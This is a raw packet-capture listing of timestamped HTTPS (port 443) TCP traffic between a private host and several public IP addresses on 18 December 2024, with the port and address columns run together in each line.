                                                                                                        Dec 18, 2024 18:49:13.930378914 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:13.931843042 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:13.931875944 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:13.931898117 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:13.931914091 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:13.931969881 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:13.934047937 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:13.935595036 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:13.935642004 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:13.935662985 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:13.942379951 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:13.942430973 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:13.942445993 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:13.950881004 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:13.950927973 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:13.950939894 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.002460957 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.053260088 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.095247984 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.095272064 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.125852108 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.125972033 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.125992060 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.132667065 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.132755041 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.132764101 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.135082960 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.135123968 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.135468960 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.135493994 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.136946917 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.136996984 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.137003899 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.140598059 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.140623093 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.140676975 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.140683889 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.140763044 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.143376112 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.143520117 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.143533945 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.145766973 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.149705887 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.149780035 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.149797916 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.155529976 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.155622005 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.155642986 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.158355951 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.158412933 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.158428907 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.166835070 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.166903019 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.166918993 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.182621002 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.183132887 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.183243990 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.183262110 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.186113119 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.190949917 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.199373960 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.199450970 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.199467897 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.204510927 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.206374884 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.206444979 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.206459999 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.213732004 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.213845015 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.213860989 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.242683887 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.242785931 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.242806911 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.255438089 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.283399105 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.298396111 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.314129114 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.317492962 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.317581892 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.317603111 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.325862885 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.327011108 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.327080011 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.327095032 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.329436064 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.329586983 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.329611063 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.334491968 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.334568977 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.334584951 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.334635973 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.344937086 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.345029116 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.345057964 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.348721027 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.348731041 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.348814011 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.353187084 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.353271008 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.353305101 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.354934931 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.354994059 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.361495018 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.362036943 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.362118959 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.362135887 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.362202883 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.363115072 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.363122940 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.363224983 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.370167971 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.376384974 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.376394987 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.376468897 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.377960920 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.378022909 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.378046036 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.383186102 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.383193016 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.383244038 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.387722969 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.387840033 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.387856007 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.389657974 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.389739990 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.389756918 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.389868021 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.392925024 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.393059969 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.395009041 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.395071983 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.395086050 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.398921013 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.398989916 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.403043032 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.403104067 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.403112888 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.405028105 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.405086040 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.408013105 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.408102989 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.413280964 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.413367987 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.415934086 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.415987968 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.415998936 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.419564009 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.419651985 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.439857960 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.439929962 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.451771975 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.451843977 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.451874018 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.502377033 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.502398014 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.508620977 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.508708954 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.509716988 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.509800911 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.509808064 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.509852886 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.509962082 CET49809443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:49:14.509974957 CET44349809104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.511048079 CET4434981335.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.512129068 CET49813443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:14.512146950 CET4434981335.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.514385939 CET4434981335.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.514484882 CET49813443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:14.516204119 CET49813443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:14.516271114 CET4434981335.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.517299891 CET49813443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:14.517308950 CET4434981335.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.518994093 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.519062996 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.519068956 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.522310972 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.522368908 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.522372961 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.531920910 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.531977892 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.531986952 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.545727015 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.545785904 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.545795918 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.545830965 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.556546926 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.556555986 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.556601048 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.557002068 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.557040930 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.564003944 CET49813443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:14.567399979 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.567409992 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.567487001 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.578342915 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.578351974 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.578440905 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.583915949 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.583921909 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.584012032 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.594289064 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.594299078 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.594470024 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.600431919 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.600529909 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.604182005 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.604275942 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.610727072 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.610812902 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.616835117 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.616913080 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.620651960 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.620735884 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.711072922 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.711190939 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.714740038 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.714824915 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.714831114 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.714869976 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.714976072 CET49811443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.714992046 CET44349811104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.977427006 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.977473021 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.977622032 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.978050947 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:14.978065014 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.998302937 CET44349776172.217.19.228192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.998385906 CET44349776172.217.19.228192.168.2.7
                                                                                                        Dec 18, 2024 18:49:14.998744011 CET49776443192.168.2.7172.217.19.228
                                                                                                        Dec 18, 2024 18:49:15.052402020 CET4434981335.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:15.052838087 CET4434981335.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:15.052989960 CET49813443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:15.053368092 CET49813443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:15.053384066 CET4434981335.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:15.053617001 CET49776443192.168.2.7172.217.19.228
                                                                                                        Dec 18, 2024 18:49:15.053636074 CET44349776172.217.19.228192.168.2.7
                                                                                                        Dec 18, 2024 18:49:15.054153919 CET49821443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:15.054192066 CET4434982135.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:15.054265976 CET49821443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:15.054517984 CET49821443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:15.054554939 CET4434982135.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.212296963 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.212764978 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:16.212788105 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.213170052 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.213663101 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:16.213663101 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:16.213680983 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.213737965 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.213766098 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:16.213783026 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.266150951 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:16.291214943 CET4434982135.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.291655064 CET49821443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:16.291688919 CET4434982135.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.292079926 CET4434982135.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.292391062 CET49821443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:16.292465925 CET4434982135.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.292540073 CET49821443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:16.339334965 CET4434982135.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.875449896 CET4434982135.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.875674009 CET4434982135.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.875746012 CET49821443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:16.875869036 CET49821443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:16.875885963 CET4434982135.190.80.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.875895977 CET49821443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:16.875941038 CET49821443192.168.2.735.190.80.1
                                                                                                        Dec 18, 2024 18:49:16.882978916 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.883008957 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.883146048 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:16.883164883 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.885240078 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.885313034 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:16.885329008 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.891519070 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.891686916 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:16.891700029 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.900324106 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.900420904 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:16.900461912 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.908968925 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.909213066 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:16.909234047 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.952672958 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:16.952719927 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:16.998519897 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:17.014664888 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.059915066 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:17.075350046 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.079782963 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.079938889 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:17.079956055 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.088167906 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.088236094 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:17.088249922 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.097184896 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.097449064 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:17.097462893 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.113723993 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.113854885 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:17.113866091 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.122591972 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.122781992 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:17.122792006 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.130964041 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.131051064 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:17.131058931 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.139755011 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.139848948 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:17.139857054 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.182595968 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:17.182606936 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.203605890 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.203669071 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:17.203679085 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.212187052 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.212280035 CET49820443192.168.2.7104.18.95.41
                                                                                                        Dec 18, 2024 18:49:17.212289095 CET44349820104.18.95.41192.168.2.7
                                                                                                        Dec 18, 2024 18:49:17.252675056 CET49820443192.168.2.7104.18.95.41
